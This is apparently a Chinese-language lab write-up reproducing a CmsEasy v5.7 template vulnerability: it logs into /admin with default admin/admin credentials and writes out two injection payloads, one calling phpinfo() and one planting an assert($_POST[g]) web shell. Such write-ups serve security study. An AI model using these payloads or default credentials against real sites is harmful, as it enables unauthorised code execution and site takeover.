访问主页

【Web】CmsEasy 漏洞复现-LMLPHP

 到处点一点没啥发现

扫目录

【Web】CmsEasy 漏洞复现-LMLPHP

访问/admin

【Web】CmsEasy 漏洞复现-LMLPHP

账号密码都是admin admin,不知道为什么,这里就先当作是默认吧

(其实都是信息检索,能在网上搜到就行hhh)

登录成功

【Web】CmsEasy 漏洞复现-LMLPHP

看到左边列表有模板,心里大概有数了哈

进行一波历史漏洞的查

 CmsEasy_v5.7 漏洞测试

payload1:

1111111111";}<?php phpinfo()?>

 【Web】CmsEasy 漏洞复现-LMLPHP

 【Web】CmsEasy 漏洞复现-LMLPHP

payload2:

11";}<?php assert($_POST[g]);?>

然而蚁剑连不上

在页面里post传g=phpinfo();可以执行

但p=system('xxx');却不能执行(没有disable_functions)

挺奇怪的,可能不是linux系统?

【Web】CmsEasy 漏洞复现-LMLPHP

11-25 18:52